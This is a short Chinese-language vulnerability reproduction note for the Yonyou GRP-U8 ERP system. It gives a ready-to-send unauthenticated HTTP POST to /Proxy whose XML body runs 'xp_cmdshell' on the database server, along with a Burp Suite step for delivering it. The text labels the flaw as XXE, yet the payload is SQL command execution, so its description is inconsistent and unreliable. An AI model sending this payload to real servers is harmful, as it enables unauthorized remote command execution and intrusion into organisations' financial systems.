用友GRP-u8 注入漏洞復現
一、漏洞描述
用友GRP-u8存在XXE漏洞,該漏洞源於應用程序解析XML輸入時沒有進制外部實體的加載,導致可加載惡意外部文件。
二、漏洞利用條件
無需登錄
三、漏洞復現
POC:
POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: localhost Content-Length: 341 Connection: Keep-Alive Cache-Control: no-cache cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
1、burp抓包,修改url為/Proxy,在body中添加payload
